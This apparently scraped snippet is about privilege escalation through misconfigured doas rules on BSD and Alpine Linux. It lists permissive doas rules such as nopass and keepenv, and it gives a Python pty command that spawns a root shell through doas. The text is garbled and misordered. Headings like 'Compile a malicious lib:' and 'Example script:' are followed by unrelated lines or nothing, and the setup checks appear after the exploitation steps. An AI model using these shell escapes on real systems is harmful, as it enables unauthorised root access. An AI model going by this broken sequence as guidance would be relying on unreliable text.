If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured.
permit nopass user1 as root cmd /usr/bin/*
Try: hacktricks doas
permit nopass user1 as root
Check:
permit keepenv user1 as root
Compile a malicious lib:
doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")'
Many binaries allow shell escapes.
Example script:
Unlike sudo, there’s no PAM, no plugin system, no logging madness — just permission rules.
which doas
command -v doas
doas -V
If installed, check the config: